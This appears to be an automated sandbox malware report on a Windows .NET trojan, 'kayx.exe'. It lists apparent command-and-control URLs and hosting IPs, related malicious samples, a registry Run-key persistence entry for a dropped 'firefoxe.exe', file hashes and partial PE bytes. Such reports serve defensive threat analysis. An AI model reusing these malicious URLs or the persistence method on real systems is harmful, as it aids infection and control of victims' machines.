          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.ghoster.agency/bg8v/?dR-0T=Hsg8WmNsaLMOQIlEIMfuFbk4MqbSZJWeSLNd01xx1olwbrd2uyfvFyB8JS14b3uA3WpV&Fxl0dR=KdShEXiX0%Avira URL Cloudsafe
          http://crl.v0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          jibenentreprenad.mobi
          184.168.131.241
          truetrue
            unknown
            ext-sq.squarespace.com
            198.185.159.141
            truefalse
              high
              www.jibenentreprenad.mobi
              unknown
              unknowntrue
                unknown
                www.ghoster.agency
                unknown
                unknowntrue
                  unknown
                  www.amtpsychology.com
                  unknown
                  unknowntrue
                    unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.jibenentreprenad.mobi/bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jb1&Fxl0dR=KdShEXiXtrue
                    • Avira URL Cloud: safe
                    unknown
                    http://www.ghoster.agency/bg8v/?dR-0T=Hsg8WmNsaLMOQIlEIMfuFbk4MqbSZJWeSLNd01xx1olwbrd2uyfvFyB8JS14b3uA3WpV&Fxl0dR=KdShEXiXtrue
                    • Avira URL Cloud: safe
                    unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpfalse
                      high
                      http://www.fontbureau.comexplorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpfalse
                        high
                        http://www.fontbureau.com/designersGexplorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpfalse
                          high
                          http://www.fontbureau.com/designers/?explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpfalse
                            high
                            http://www.founder.com.cn/cn/bTheexplorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designers?explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpfalse
                              high
                              http://www.tiro.comexplorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.com/designersexplorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpfalse
                                high
                                http://www.goodfont.co.krexplorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.carterandcone.comlexplorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.sajatypeworks.comexplorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.typography.netDexplorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpfalse
                                  high
                                  http://www.founder.com.cn/cn/cTheexplorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://fontfabrik.comexplorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.founder.com.cn/cnexplorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpfalse
                                    high
                                    https://www.jiben.se/bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jbmstsc.exe, 00000015.00000002.487573696.000000000543D000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.jiyu-kobo.co.jp/explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com/designers8explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.fonts.comexplorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.sandoll.co.krexplorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.urwpp.deDPleaseexplorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.zhongyicts.com.cnexplorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.sakkal.comexplorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://crl.vexplorer.exe, 00000012.00000000.377196648.000000000F640000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown

                                        Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public

                                        IPDomainCountryFlagASNASN NameMalicious
                                        184.168.131.241
                                        unknownUnited States
                                        26496AS-26496-GO-DADDY-COM-LLCUStrue
                                        198.185.159.141
                                        unknownUnited States
                                        53831SQUARESPACEUSfalse

                                        General Information

                                        Joe Sandbox Version:31.0.0 Red Diamond
                                        Analysis ID:321226
                                        Start date:20.11.2020
                                        Start time:16:30:50
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 11m 37s
                                        Hypervisor based Inspection enabled:false
                                        Report type:light
                                        Sample file name:kayx.exe
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:28
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:1
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.evad.winEXE@14/3@4/2
                                        EGA Information:Failed
                                        HDC Information:
                                        • Successful, ratio: 24.8% (good quality ratio 23.3%)
                                        • Quality average: 73.5%
                                        • Quality standard deviation: 29.4%
                                        HCA Information:
                                        • Successful, ratio: 97%
                                        • Number of executed functions: 0
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        • Found application associated with file extension: .exe
                                        Warnings:
                                        Show All
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                        • TCP Packets have been reduced to 100
                                        • Excluded IPs from analysis (whitelisted): 13.64.90.137, 104.42.151.234, 104.43.139.144, 23.210.248.85, 51.104.144.132, 205.185.216.10, 205.185.216.42, 40.67.251.132, 20.54.26.129, 92.122.213.194, 92.122.213.247
                                        • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, par02p.wns.notify.windows.com.akadns.net, db5p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, skypedataprdcolwus16.cloudapp.net
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        16:32:44AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run firefoxe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe"
                                        16:32:52AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run firefoxe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe"

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        184.168.131.241Payment Advice - Advice Ref GLV823990339.exeGet hashmaliciousBrowse
                                        • www.crestviewlab.com/gyo3/?Ez=NAGhR2B897xHmSjBg9ib6asY38nnY4Q4yyZMB+Gj9us/EkxfPSnFK1AIwmtjw0HkqurxQu+N+g==&lhud=TjfdU2S
                                        MV.KMTC JEBEL ALI_pdf.exeGet hashmaliciousBrowse
                                        • www.carwashcustom.com/y9z/?uFQl=fY5jeAtp1RdNWaxm5n6iTAw0V/8P2zZ8OtxyEaiRQwZkZsJ+cMlcko/IfBrIT9W4DRCI&CTvp=fv10_lYhrxJtW6
                                        PO0119-1620 LQSB 0320 Siemens.exeGet hashmaliciousBrowse
                                        • www.fluidartindia.com/sppe/?DnadT=jX6zF4/w1i207zkr1riL1VOogE6y0WgJJqDlfpP213KajKiR8CXisvGZ1eNGgJa3LVxH&DxlLi=2dmX
                                        PROOF OF PAYMENT.exeGet hashmaliciousBrowse
                                        • www.fastsalvage.com/mua8/?nflpdH=B0qyrwayxD8wcQG3Qbr3RYD+R2QNZFulkGJHcFvF3VxCu8MwJpoGpma0wXvOyVIO8Q3D&w48t=0pY022IXUBwLfpfP
                                        POSH XANADU Order-SP-20-V241e.xlsxGet hashmaliciousBrowse
                                        • www.upgradetomastery.com/dtn/?8ptdvJ=KT0pXTAPFjE0&lb=VKiUsABvcSkQZcVKnfuC8vDN1G6FwU6V98eOKuQh0UKncmK0g9i99ZESG6mkSNKYPbsfxw==
                                        jrzlwOa0UC.exeGet hashmaliciousBrowse
                                        • www.enerjikbilin.com/t4vo/?Dxlpd=zukTNKzNObihvOlNQP8dibmkyr3w1VW9LXTzCAncEay1uwCtweD+d3+np2U01Umj+Zu9uG7hEQ==&lhuh=TxlhfFN
                                        PDF ICITIUS33BUD10307051120003475.exeGet hashmaliciousBrowse
                                        • www.applywithrand.com/iic6/?DV8TCr-=yPIpthC5MtqHoy4c0EHwGIh2/j/8JQggFFSPND+1HWd+sJXvHNRkMzNQskTglzxbquBo&U0DH6=kf50d0Dh3Z44mV
                                        Invoice.exeGet hashmaliciousBrowse
                                        • www.forsythcourtseniorliving.com/rhk/?2dtd9h=mjpPyjuxPhk0&3f=zT6q1JDKfhV2EvEX8/2jysHCuf0tBNhQsP2YiyzGtHytBzTfjT3OdZVqaOBr+/tLjoXCZ7lNZQ==
                                        COMMERCIAL INVOICE BILL OF LADING DOC.exeGet hashmaliciousBrowse
                                        • www.qubitlaboratories.com/o9b2/?J484=xPJtLXbX&u6u4=3LGybaBE5u/MmrsyhaNWg7uW/vPINQPoFsX0YN7a6o2wuLOqT6PUoiZZCA7i0eNZ3qK2
                                        Invoice.exeGet hashmaliciousBrowse
                                        • www.bitcoincandy.xyz/hko6/?7nE8Zrx=tXOddRziBZnyKXnXE9Kw2rrsPuH0SCZGoRNpDj1avThKGPBCs+LEjAOKKD9kUp/tb+4v&LXed=XPUxDVP8ThYHYxS0
                                        ALPHA_PO_16201844580.exeGet hashmaliciousBrowse
                                        • www.timberlinepallets.com/ihj8/?FDHH=Cnt+6nHyGXRUU+110cZEsnWWKj+9Yye+cLBJL0AmBtVe9ccrmOicj2d+yDCCaYm3sR4n&Rl=VtxXE
                                        QFCPrfsJLeeYpN5.exeGet hashmaliciousBrowse
                                        • www.outsourcedbim.com/k8b/
                                        nnnf.exeGet hashmaliciousBrowse
                                        • www.cheap-housekeeping.com/bns/?uVg8=DFuD2CwFEFTZMlFq3QqcpFj8rgjdPttxv8Nv7PXL+ekRjc0K8Zw+qc+ng0ER0qX/SACF&R48Hj=NtxpKjcxbp2XFTE
                                        iz06VVmz0l.exeGet hashmaliciousBrowse
                                        • www.maskupforschool.com/d8h/?rVOp32=b4AuRmO5mJIYTa03Ryq3knCjLs8pOUSKEouWqDiq2O5vgkJvPoAU5b8ioX3ikWgjFYnw&GV2p=8pMx2630Gf6TGP
                                        0VikCnzrVT.exeGet hashmaliciousBrowse
                                        • www.enerjikbilin.com/t4vo/?2db=X48HMfxHf&-Z8=zukTNKzNObihvOlNQP8dibmkyr3w1VW9LXTzCAncEay1uwCtweD+d3+np2UNqlGgwPy6uG7mXg==
                                        New Additional Agreement - Commercial and Technical Proposal for Supply.exeGet hashmaliciousBrowse
                                        • www.dentonparalegals.com/bw82/?tVm0=DrsoiajnQdnXVIU/gL2U5CLusm9v5BrmFGY2mUU9NwKfyFU9+RZid9vo/OyzH4K2w5lEorrqfA==&U4kp=Ntx4URGPjVrdVrx
                                        Additional Agreement 2020-KYC.exeGet hashmaliciousBrowse
                                        • www.dentonparalegals.com/bw82/?RR=DrsoiajnQdnXVIU/gL2U5CLusm9v5BrmFGY2mUU9NwKfyFU9+RZid9vo/OyzH4K2w5lEorrqfA==&E6A=8pMPQv
                                        ORDER 20200717-019.exeGet hashmaliciousBrowse
                                        • www.autokouluhaapalainen.com/svh9/?lZ3=fjnpVFfxOD2&D8S=sgrU0uWM3R9oNhmUUypjEsSXdQLL1THxdgQkCyVGvGZbR0orT1tg9H1luYchBJO1oel5jSmuSA==
                                        http://149.129.50.37/Get hashmaliciousBrowse
                                        • www.proxywiki.org/pub/Support/FAQ/pwbtn.gif
                                        PI210941.exeGet hashmaliciousBrowse
                                        • www.enerjikbilin.com/t4vo/?o2J=zukTNKzNObihvOlNQP8dibmkyr3w1VW9LXTzCAncEay1uwCtweD+d3+np14O2VKY9uPs&4h0=vZR8DbS8Z4yXah
                                        198.185.159.141NEW PO.exeGet hashmaliciousBrowse
                                        • www.pharmacymillwork.com/sbmh/?pPE=QetpKiLtmyz1LeM7dHiGsBNA/OD0ioqbSKhtijaCssQV8Cp1A0yk54z8I+AGFYuSeeOvrJLfeA==&-Zi=V48LDDzx
                                        H4A2-423-EM154-302.exeGet hashmaliciousBrowse
                                        • www.yourmatch.club/dn87/?D818=38AK/AHgtArI3vIGuczJM2geIxEZ/6YOh3hqbZK51swbGhAkUhePPwhzVXw1NVydmPq5&uTuD=ApdlgZ4

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        ext-sq.squarespace.comBANK ACCOUNT INFO!.exeGet hashmaliciousBrowse
                                        • 198.49.23.141
                                        Purchase Order 40,7045.exeGet hashmaliciousBrowse
                                        • 198.49.23.141
                                        Payment Advice - Advice Ref GLV823990339.exeGet hashmaliciousBrowse
                                        • 198.49.23.141
                                        http://f69e.engage.squarespace-mail.comGet hashmaliciousBrowse
                                        • 198.49.23.141
                                        dB7XQuemMc.exeGet hashmaliciousBrowse
                                        • 198.49.23.141
                                        hRVrTsMv25.exeGet hashmaliciousBrowse
                                        • 198.49.23.141
                                        v6k2UHU2xk.exeGet hashmaliciousBrowse
                                        • 198.185.159.141
                                        NzI1oP5E74.exeGet hashmaliciousBrowse
                                        • 198.49.23.141
                                        PO.exeGet hashmaliciousBrowse
                                        • 198.49.23.141
                                        H4A2-423-EM154-302.exeGet hashmaliciousBrowse
                                        • 198.185.159.141
                                        KZ7qjnBlZF.exeGet hashmaliciousBrowse
                                        • 198.49.23.141
                                        scnn7676766.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        price quote.exeGet hashmaliciousBrowse
                                        • 198.185.159.145
                                        t64.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        Preview_Annual.xlsbGet hashmaliciousBrowse
                                        • 198.49.23.145
                                        Se adjunta un nuevo pedido.exeGet hashmaliciousBrowse
                                        • 198.49.23.145
                                        wPthy7dafVcH94f.exeGet hashmaliciousBrowse
                                        • 198.49.23.144
                                        54nwZp1aPg.exeGet hashmaliciousBrowse
                                        • 198.49.23.144
                                        uiy3OAYIpt.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        zisuzZpoW2.exeGet hashmaliciousBrowse
                                        • 198.49.23.145

                                        ASN

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        SQUARESPACEUSBANK ACCOUNT INFO!.exeGet hashmaliciousBrowse
                                        • 198.49.23.141
                                        http://WWW.ALYSSA-J-MILANO.COMGet hashmaliciousBrowse
                                        • 198.185.159.141
                                        Payment Advice - Advice Ref GLV823990339.exeGet hashmaliciousBrowse
                                        • 198.49.23.141
                                        baf6b9fcec491619b45c1dd7db56ad3d.exeGet hashmaliciousBrowse
                                        • 198.49.23.177
                                        http://f69e.engage.squarespace-mail.comGet hashmaliciousBrowse
                                        • 198.49.23.141
                                        NEW PO.exeGet hashmaliciousBrowse
                                        • 198.185.159.141
                                        p8LV1eVFyO.exeGet hashmaliciousBrowse
                                        • 198.49.23.177
                                        dB7XQuemMc.exeGet hashmaliciousBrowse
                                        • 198.49.23.141
                                        hRVrTsMv25.exeGet hashmaliciousBrowse
                                        • 198.49.23.141
                                        qkN4OZWFG6.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        kvdYhqN3Nh.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        NzI1oP5E74.exeGet hashmaliciousBrowse
                                        • 198.49.23.141
                                        IQtvZjIdhN.exeGet hashmaliciousBrowse
                                        • 198.49.23.177
                                        PO.exeGet hashmaliciousBrowse
                                        • 198.49.23.141
                                        148wWoi8vI.exeGet hashmaliciousBrowse
                                        • 198.49.23.177
                                        H4A2-423-EM154-302.exeGet hashmaliciousBrowse
                                        • 198.185.159.141
                                        KZ7qjnBlZF.exeGet hashmaliciousBrowse
                                        • 198.49.23.141
                                        scnn7676766.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        price quote.exeGet hashmaliciousBrowse
                                        • 198.185.159.145
                                        t64.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        AS-26496-GO-DADDY-COM-LLCUSPURCHASE ORDER.exeGet hashmaliciousBrowse
                                        • 166.62.27.57
                                        USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEGet hashmaliciousBrowse
                                        • 192.186.237.168
                                        BANK-STATMENT _xlsx.exeGet hashmaliciousBrowse
                                        • 166.62.27.57
                                        Purchase Order 40,7045.exeGet hashmaliciousBrowse
                                        • 198.71.232.3
                                        Payment Advice - Advice Ref GLV823990339.exeGet hashmaliciousBrowse
                                        • 184.168.131.241
                                        MV.KMTC JEBEL ALI_pdf.exeGet hashmaliciousBrowse
                                        • 184.168.131.241
                                        PO0119-1620 LQSB 0320 Siemens.exeGet hashmaliciousBrowse
                                        • 184.168.131.241
                                        PO#0007507_009389283882873PDF.exeGet hashmaliciousBrowse
                                        • 192.186.237.168
                                        http://homeschoolingteen.comGet hashmaliciousBrowse
                                        • 107.180.51.106
                                        http://p3nlhclust404.shr.prod.phx3.secureserver.netGet hashmaliciousBrowse
                                        • 72.167.191.65
                                        INQUIRY.exeGet hashmaliciousBrowse
                                        • 166.62.27.57
                                        moses.exeGet hashmaliciousBrowse
                                        • 148.66.138.196
                                        PROOF OF PAYMENT.exeGet hashmaliciousBrowse
                                        • 184.168.131.241
                                        baf6b9fcec491619b45c1dd7db56ad3d.exeGet hashmaliciousBrowse
                                        • 184.168.131.241
                                        https://j.mp/38NwiZZGet hashmaliciousBrowse
                                        • 107.180.26.71
                                        POSH XANADU Order-SP-20-V241e.xlsxGet hashmaliciousBrowse
                                        • 184.168.131.241
                                        https://tg325.infusion-links.com/api/v1/click/5985883831533568/6575528038498304Get hashmaliciousBrowse
                                        • 198.71.233.138
                                        https://tg325.infusion-links.com/api/v1/click/5985883831533568/6575528038498304Get hashmaliciousBrowse
                                        • 198.71.233.138
                                        anthony.exeGet hashmaliciousBrowse
                                        • 107.180.4.22
                                        https://sailingfloridakeys.com/Guarantee/Get hashmaliciousBrowse
                                        • 104.238.92.18

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\kayx.exe.log
                                        Process:C:\Users\user\Desktop\kayx.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:modified
                                        Size (bytes):425
                                        Entropy (8bit):5.340009400190196
                                        Encrypted:false
                                        SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhav:ML9E4Ks2wKDE4KhK3VZ9pKhk
                                        MD5:CC144808DBAF00E03294347EADC8E779
                                        SHA1:A3434FC71BA82B7512C813840427C687ADDB5AEA
                                        SHA-256:3FC7B9771439E777A8F8B8579DD499F3EB90859AD30EFD8A765F341403FC7101
                                        SHA-512:A4F9EB98200BCAF388F89AABAF7EA57661473687265597B13192C24F06638C6339A3BD581DF4E002F26EE1BA09410F6A2BBDB4DA0CD40B59D63A09BAA1AADD3D
                                        Malicious:true
                                        Reputation:moderate, very likely benign file
                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..
                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe
                                        Process:C:\Users\user\Desktop\kayx.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):432640
                                        Entropy (8bit):7.899249270813086
                                        Encrypted:false
                                        SSDEEP:6144:2k6/GQOb8Jv8lhFf3cbXPFF7pnWtZBkPsMQ3GYYm5O3iMEbSpchQZd/l:2f/GDAJEn9crPFFFnWvLNBbSpZdd
                                        MD5:A80E73A824B655491F54278B7A29467D
                                        SHA1:F33DDFFC223C9AFA4E226D3567B990A8E44828E6
                                        SHA-256:BDCD13ABDDED8F4F709FB288FB78B4AFFF486854B3EA78AD378D11220A31C3C4
                                        SHA-512:382DE45D9EFB0214BAEDDF26645A1858E5FF8A5090CFC1FCBCB552C03D69B1D0B78DE7833D7CEAFAFDE29CCF38B974E2D691EFF9249140BCB013E88EE15B482D
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 46%
                                        Reputation:low
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....z._.................L...L.......i... ........@.. ....................................@..................................i..J.......VI........................................................................... ............... ..H............text....J... ...L.................. ..`.rsrc...VI.......J...N..............@..@.reloc..............................@..B.................i......H.......@w...8......F...................................................N+.+.*(....+.(X...+...(....*.~....*..+......*.+..~....*..+......*.+...(....*..(....*..(....*..(....*..(....*..(....*..(....*..(....*..(....*.+.+.+.+.+...c+.*.+..+.(K...+..+..+.(K...+...+'{....{m...+.{}...+.. ...._+.{z...+..+.*.+..+..+..+..+.(....+..0..........8....{?...8....8....8....{@...1.8....{@.....+)8....{?...8....{@...Y8.....-6X ...._8.......,...-..Y...1#.{>... .....Y...(.....-...X...,"....{>.....Y.
                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe:Zone.Identifier
                                        Process:C:\Users\user\Desktop\kayx.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Reputation:high, very likely benign file
                                        Preview: [ZoneTransfer]....ZoneId=0

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):7.899249270813086
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        • DOS Executable Generic (2002/1) 0.01%
                                        File name:kayx.exe
                                        File size:432640
                                        MD5:a80e73a824b655491f54278b7a29467d
                                        SHA1:f33ddffc223c9afa4e226d3567b990a8e44828e6
                                        SHA256:bdcd13abdded8f4f709fb288fb78b4afff486854b3ea78ad378d11220a31c3c4
                                        SHA512:382de45d9efb0214baeddf26645a1858e5ff8a5090cfc1fcbcb552c03d69b1d0b78de7833d7ceafafde29ccf38b974e2d691eff9249140bcb013e88ee15b482d
                                        SSDEEP:6144:2k6/GQOb8Jv8lhFf3cbXPFF7pnWtZBkPsMQ3GYYm5O3iMEbSpchQZd/l:2f/GDAJEn9crPFFFnWvLNBbSpZdd
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....z._.................L...L.......i... ........@.. ....................................@................................

                                        File Icon

                                        Icon Hash:031c185e1a2e4608

                                        Static PE Info

                                        General

                                        Entrypoint:0x4669fc
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                        Time Stamp:0x5FB67AE0 [Thu Nov 19 14:02:08 2020 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:v4.0.30319
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                        Entrypoint Preview

                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
